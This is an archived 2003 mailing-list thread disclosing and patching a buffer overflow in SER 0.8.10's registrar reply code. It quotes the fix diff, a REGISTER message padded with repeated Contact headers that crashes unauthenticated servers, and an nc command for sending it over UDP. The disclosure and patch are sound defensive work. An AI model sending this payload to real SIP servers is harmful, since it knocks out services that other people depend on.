[Serusers] [HEADS UP] security vulnerability in ser 0.8.10

Jan Janak J.Janak at sh.cvut.cz
Sat Jan 18 12:02:12 CET 2003 

Thanks, I applied the patch. The function was marked on my todo list as
"to be rewritten", your patch saves me some time.

  regards, Jan.

On 18-01 03:41, Maxim Sobolev wrote:
> Folks,
> 
> While playing with SER I found that I can trigger repeatable crash when
> doing REGISTER multiple times. Quick glance at the code in question
> revealed that indeed, when constructing reply to REGISTER message,
> SER uses fixed-lengh buffer to put all non-expired contacts for that
> user and doesn't bother to check for overflow. The bug could be easily
> exploited by a complete stranger on servers that don't perform
> authentification of REGISTER requests, and by an user with a valid
> credintals on server that do authentification. Mounting attack leads
> to denial of service.
> 
> Attached please find fake REGISTER message, which if sent to open
> server kills it (nc -u my.sip.server 5060 < register.killser),
> and patch to fix the problem.
> 
> -Maxim

> 
> $FreeBSD$
> 
> --- modules/registrar/reply.c	2003/01/18 00:39:05	1.1
> +++ modules/registrar/reply.c	2003/01/18 01:13:13
> @@ -53,32 +53,57 @@
>   */
>  void build_contact(ucontact_t* _c)
>  {
> +	char *lastgoodend;
> +	int nummissed;
> +
>  	l = 0;
> +	lastgoodend = b;
>  	while(_c) {
>  		if (_c->expires > act_time) {
> +			if (l + 10 >= MAX_CONTACT_BUFFER)
> +				break;
>  			memcpy(b + l, "Contact: <", 10);
>  			l += 10;
>  			
> +			if (l + _c->c.len >= MAX_CONTACT_BUFFER)
> +				break;
>  			memcpy(b + l, _c->c.s, _c->c.len);
>  			l += _c->c.len;
>  			
> +			if (l + 4 >= MAX_CONTACT_BUFFER)
> +				break;
>  			memcpy(b + l, ">;q=", 4);
>  			l += 4;
>  			
> -			l += sprintf(b + l, "%-3.2f", _c->q);
> +			l += snprintf(b + l, MAX_CONTACT_BUFFER - l, "%-3.2f", _c->q);
> +			if (l >= MAX_CONTACT_BUFFER)
> +				break;
>  			
> +			if (l + 9 >= MAX_CONTACT_BUFFER)
> +				break;
>  			memcpy(b + l, ";expires=", 9);
>  			l += 9;
>  			
> -			l += sprintf(b + l, "%d", (int)(_c->expires - act_time));
> -			
> +			l += snprintf(b + l, MAX_CONTACT_BUFFER - l, "%d", (int)(_c->expires - act_time));
> +			if (l >= MAX_CONTACT_BUFFER)
> +				break;
> +
> +			if (l + 2 >= MAX_CONTACT_BUFFER)
> +				break;
>  			*(b + l++) = '\r';
>  			*(b + l++) = '\n';
> +			lastgoodend = b + l;
>  		}
>  
>  		_c = _c->next;
>  	}
> -	
> +	if (lastgoodend - b != l) {
> +		l = lastgoodend - b;
> +		for(nummissed = 0; _c; _c = _c->next)
> +			nummissed++;
> +		LOG(L_ERR, "build_contact(): Contact list buffer exhaused, %d contact(s) ignored\n", nummissed);
> +	}
> +
>  	DBG("build_contact(): Created Contact HF: %.*s\n", l, b);
>  }
>  

> REGISTER sip:127.0.0.1 SIP/2.0
> Via: SIP/2.0/UDP 127.0.0.2:123;branch=z9hG4bKnashds7
> Max-Forwards: 70
> To: Bob <sip:bob at biloxi.com>
> From: Bob <sip:bob at biloxi.com>;tag=456248
> Call-ID: 843817637684230 at 998sdasdh09
> CSeq: 1826 REGISTER
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Expires: 7200
> Content-Length: 0
> User-Agent: Cisco ATA  v2.15 ata186 (020918a)

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: not available
URL: <http://lists.sip-router.org/pipermail/sr-users/attachments/20030118/03cde411/attachment.pgp>

More information about the sr-users mailing list